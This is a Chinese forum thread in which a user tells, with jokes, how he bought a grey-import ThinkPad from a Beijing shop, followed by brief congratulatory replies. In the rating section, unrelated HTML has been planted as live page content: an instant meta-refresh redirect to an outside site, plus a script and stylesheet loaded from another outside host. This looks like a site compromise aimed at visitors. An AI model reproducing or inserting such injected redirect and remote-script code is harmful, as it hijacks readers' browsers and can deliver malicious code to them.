开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

[X系列] 我的DQ3购买日记

我的DQ3购买日记
决定买笔记本已经有很长时间了,一直没决定买什么牌子的。有时间就上网上看,最早想买HP感觉质量和品牌都不错,刚好朋友有一台四五年前买的机子,到现在还能用,不过听他说HP的机子中商务机还行,家用的就不行了,外壳比较软,不耐压。然后又看中了DELL的XPS1210,当时都准备下单买了,公司派我到北京出差,刚好我朋友急用钱,我就把我的钱借给他了。也就没买,现在想想还是应该感谢他。
8月份到北京后有空就上网看机子,当时还不知道有xy。就整天在pcpop上一边看一边流口水还一边等XPS1210降价,其间还抽空去了几趟中关村,那边的人太热情了,热的我都有点受不了。有时在网上也看过几次小黑,都被他的价格吓跑了。pcpop上有报价有时后也查一下小黑的报价。到了1月初在pcpop上看到一款小黑一万一左右配置还比较高,当时好象是27c(时间长了忘了)用google查了一下才知道是水货,一下子在我购机的道路上又有一条新的路。赶紧打电话找朋友问有没有人买水的小黑质量怎么样。经过多方询问他们告诉我买水货,关键是要找有信誉的商家。我又不知道怎么找,在北京也不怎么熟。总不能见人就问北京那有买水货笔记本。于是只能用google搜索,还真找到几家论坛。注册——潜水——灌水,按照常规步骤一步一步来。慢慢发现xy上人气比较旺,坛友比较热情。下定决心在xy买。刚好快过春节了,就一直等春节优惠,那会每天上班的第一件事就是上网看春节优惠出来了没,有时也发贴问。2月7号一上班看发现红色消息春节优惠出来了。很高兴。准备下手了。哈哈
2月9号上午还上了一会班,中午吃饭后,打电话确认DQ3有货,去银行取钱,北京的银行竟然还要排队,很生气(在我们那只要银行开门,随时去随时去)排了一小时的队终于取到钱,打车身上带着钱没敢作公交。到了后如网友所说一进门就看见满墙的包,没搞错。之后拿机——验机(因为相信xy自己也没带软件用的是xy的)——选D套餐升级内存——xy的MM问我要帖膜吗当时刚好旁边有一位朋友他的机子贴好了膜,我过去看了一下效果很好临时决定也贴上——另外又买了原装包和内胆包xy送清洁套装——交钱装箱准备走人时出了点小笑话,因为以前上网可能没看清楚还是咋地把送的光驱上的螺丝当成螺丝刀。以为还送螺丝刀让xy的GGMM们小小的鄙视了一把。::78:: ::78:: ::78:: ::78:: ::78:: ::78::
回来后装软件装游戏玩。挺好使的机子也漂亮越看越喜欢。::91:: ::91::::91:: ::91::
我能买这台小黑我首先要感谢党感谢人民,其次要感谢我的公司是他们见月按时发工资才让我攒这些钱。再次要感谢我的我的岳父岳母是他们坚持要把我媳妇再养几年,一直没让我见上一面。然后要感谢xy是xy给我指了条明路。然后还要感谢……别扔砖头。::80:: ::80:: ::80:: 以上段落纯属搞笑。不过要真的感谢xy的GG们MM们,祝你们生意越办越好。以后我有朋友要买的话还介绍他们来xy

+200---tszmsid
<meta http-equiv="refresh" content="0; url=http://www.1117.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />
<P>&nbsp;</P>

评分

tszmsid + 200

没图,祝贺一下
口水
祝贺一下
楼主啊,恭喜
再谢谢CCTV,哈哈
恭喜楼主。
不错,我喜欢DQ3,有没有图片啊